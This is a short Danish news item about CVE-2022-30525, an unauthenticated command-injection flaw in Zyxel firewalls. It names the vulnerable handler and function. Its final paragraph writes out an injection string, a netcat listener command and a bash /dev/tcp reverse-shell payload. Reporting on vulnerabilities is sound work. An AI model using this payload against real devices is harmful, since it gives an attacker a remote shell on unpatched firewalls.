Sårbarhed i Zyxel-firewalls, der tillader kodeudførelse uden godkendelse

En kritisk sårbarhed (CVE-2022-30525) er blevet identificeret i Zyxel-enheder i ATP-, VPN- og USG FLEX-serien, designet til at organisere driften af ​​firewalls, IDS og VPN i virksomheder, hvilket gør det muligt for en ekstern hacker at udføre kode på enhed uden brugerrettigheder uden godkendelse. For at udføre et angreb skal en angriber være i stand til at sende anmodninger til enheden ved hjælp af HTTP/HTTPS-protokollen. Zyxel har rettet sårbarheden i ZLD 5.30 firmwareopdateringen. Ifølge Shodan-tjenesten er der i øjeblikket 16213 potentielt sårbare enheder på det globale netværk, som accepterer anmodninger via HTTP/HTTPS.

Betjening udføres ved at sende specialdesignede kommandoer til webhandleren /ztp/cgi-bin/handler, tilgængelig uden godkendelse. Problemet er forårsaget af manglen på korrekt oprydning af anmodningsparametre, når kommandoer udføres på systemet ved hjælp af os.system-kaldet, der bruges i lib_wan_settings.py-biblioteket og udføres, når setWanPortSt-operationen behandles.

For eksempel kan en angriber sende strengen "; ping 192.168.1.210;" hvilket vil føre til udførelse af kommandoen "ping 192.168.1.210" på systemet. For at få adgang til kommandoskallen kan du køre “nc -lvnp 1270” på dit system og derefter starte en omvendt forbindelse ved at sende en anmodning til enheden med '; bash -c \»exec bash -i &>/dev/tcp/192.168.1.210/1270 <&1;\»;'.

Kilde: opennet.ru

Tilføj en kommentar